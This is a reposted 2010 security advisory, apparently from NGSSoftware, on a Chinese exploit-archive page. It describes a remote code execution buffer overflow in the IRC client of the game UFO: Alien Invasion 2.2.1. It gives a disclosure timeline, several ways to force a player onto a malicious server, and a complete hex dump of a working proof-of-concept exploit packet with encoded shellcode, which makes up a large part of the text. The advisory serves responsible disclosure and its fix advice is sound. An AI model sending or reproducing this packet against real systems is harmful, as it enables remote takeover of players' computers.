首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
UFO: Alien Invasion v2.2.1 Remote Arbitrary Code Execution Vulnerability
来源:http://www.nextgenss.com/ 作者:Geffner 发布时间:2010-06-28  

Remote Arbitrary Code Execution Vulnerability in UFO: Alien Invasion
--------------------------------------------------------------------

June 18th, 2010

=======
Summary
=======
Name: Remote Arbitrary Code Execution Vulnerability in UFO: Alien Invasion
Release Date: June 18th, 2010
Discoverer: Jason Geffner
Version Affected: UFO: Alien Invasion 2.2.1
                 (version previous to UFO: Alien Invasion 2.2.1 not tested)
Risk: Very High
Status: Published

============
Introduction
============
This paper discusses how an unprivileged remote attacker can execute arbitrary
code on networked players' computers. This vulnerability was responsibly
disclosed to the UFO: Alien Invasion project leader and this advisory was not
released until a stable fixed build of the game was released.

==========
Background
==========
"UFO: Alien Invasion is an open source strategy video game in which the player
fights aliens that are trying to take control of the Earth. The game is heavily
influenced by the X-COM series (mostly by UFO: Enemy Unknown). It is based on a
modified id Tech 2 engine, and runs on Linux, Microsoft Windows, and Mac OS X
for both PPC and Intel Macs. UFO:AI has been nominated for 'Best project for
Gamers' in the Sourceforge 2007 and 2008 Community Choice Awards and was
positively noted by Linux Journal." [1]

========
Timeline
========
04/29/08 UFO: Alien Invasion 2.2.1 released
10/28/09 Remote arbitrary code execution vulnerability discovered in UFO: Alien
        Invasion 2.2.1
10/31/09 Detailed vulnerability report responsibly disclosed to the UFO: Alien
        Invasion project leader
11/02/09 Fix checked into source code trunk
06/18/10 Stable build of UFO: Alien Invasion 2.3 released, fixing vulnerability
06/18/10 Advisory released

=============
Vulnerability
=============
The IRC client component of UFO: Alien Invasion 2.2.1 contains multiple
security vulnerabilities that allow a malicious IRC server to remotely execute
arbitrary code on the client's system. There are numerous ways that an attacker
could cause a player to connect to a malicious server, for example:

- Perform a man-in-the-middle attack to inject IRC server responses into the
 TCP stream.
- Use DNS poisoning to redirect the player's client from the real
 irc.freenode.org server to the attacker's malicious server.
- Use the in-game "rcon" functionality against a server to remotely issue the
 command "irc_connect <attacker's server>" (passwords for rcon can be
 brute-forced and/or sniffed over the network since they're sent in
 plaintext).
- Use social engineering to convince a player to press ~ and type "irc_connect
 <attacker's server>".

There are numerous buffer overflow vulnerabilities that can be exploited in the
IRC client component. The following vulnerability can be exploited in a single
packet:

The Irc_Proto_ParseServerMsg(...) function parses server messages of up to 1024
bytes in length and writes to an irc_server_msg_t structure. This structure's
last field is a 512-byte string buffer. A malformed server response can cause
Irc_Proto_ParseServerMsg(...) to write past the end of the irc_server_msg_t
structure and overwrite the return address for Irc_Logic_ReadMessages(...).

=======
Exploit
=======
See below for a proof-of-concept exploit packet for UFO: Alien Invasion 2.2.1
for Windows. The payload will launch "mspaint.exe" and terminate the UFO: Alien
Invasion process.

00000000:  30 30 31 20 3a 41 41 41 41 41 41 41 41 41 41 41    001 :AAAAAAAAAAA
00000010:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000020:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000030:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000040:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000050:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000060:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000070:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000080:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000090:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000000a0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000000b0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000000c0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000000d0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000000e0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000000f0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000100:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000110:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000120:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000130:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000140:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000150:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000160:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000170:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000180:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000190:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000001a0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000001b0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000001c0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000001d0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000001e0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
000001f0:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000200:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000210:  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41    AAAAAAAAAAAAAAAA
00000220:  41 41 41 41 41 41 41 41 41 41 41 41 41 28 50 d2    AAAAAAAAAAAAA(P.
00000230:  0a 2b c9 83 e9 cd e8 ff ff ff ff c0 5e 81 76 0e    .+..........^.v.
00000240:  76 83 85 b6 83 ee fc e2 f4 8a 6b 0c b6 76 83 e5    v.........k..v..
00000250:  3f 93 b2 57 d2 fd d1 b5 3d 24 8f 0e e4 62 08 f7    ?..W....=$...b..
00000260:  9e 79 34 cf 90 47 7c b4 76 da bf e4 ca 74 af a5    .y4..G|.v....t..
00000270:  77 b9 8e 84 71 94 73 d7 e1 fd d1 95 3d 34 bf 84    w...q.s.....=4..
00000280:  66 fd c3 fd 33 b6 f7 cf b7 a6 d3 0e fe 6e 08 dd    f...3........n..
00000290:  96 77 50 66 8a 3f 08 b1 3d 77 55 b4 49 47 43 29    .wPf.?..=wU.IGC)
000002a0:  77 b9 8e 84 71 4e 63 f0 42 75 fe 7d 8d 0b a7 f0    w...qNc.Bu.}....
000002b0:  54 2e 08 dd 92 77 50 e3 3d 7a c8 0e ee 6a 82 56    T....wP.=z...j.V
000002c0:  3d 72 08 84 66 ff c7 a1 92 2d d8 e4 ef 2c d2 7a    =r..f....-...,.z
000002d0:  56 2e dc df 3d 64 68 03 eb 1c 82 08 33 cf 83 85    V...=dh.....3...
000002e0:  b6 26 eb b4 3d 19 04 7a 63 cd 73 30 14 20 eb 23    .&..=..zc.s0. .#
000002f0:  23 cb 1e 7a 63 4a 85 f9 bc f6 78 65 c3 73 38 c2    #..zcJ....xe.s8.
00000300:  a5 04 ec ef b6 25 7c 50 db 05 f3 e4 df 18 f7 ab    .....%|P........
00000310:  d3 0e e6 85 b6 0d 0a                               .......

==========
Conclusion
==========
Safe string handling functions should be used instead of their standard CRT
equivalents or inlined string copies.

===============
Fix Information
===============
This issue has now been resolved. UFO: Alien Invasion 2.3 can be downloaded
from http://ufoai.ninex.info/wiki/index.php/Download

==========
References
==========
[1] http://en.wikipedia.org/wiki/UFO:_Alien_Invasion

NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·BlazeDVD v6 (.plf) SEH univers
·ShellCode WinXP SP3 SPA URLDow
·Novell iManager Multiple Vulne
·NO-IP.com Dynamic DNS Update C
·Weborf HTTP Server Denial of S
·Winstats (.fma) Local Buffer O
·FreeBSD Kernel mountnfs() Expl
·Allwin WinExec cmd.exe + ExitP
·FreeBSD Kernel nfs_mount() Exp
·Geomau 7 (.wg2) local Buffer O
·Subtitle Translation Wizard v3
·Plotwn 18 (.wp2) local Buffer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved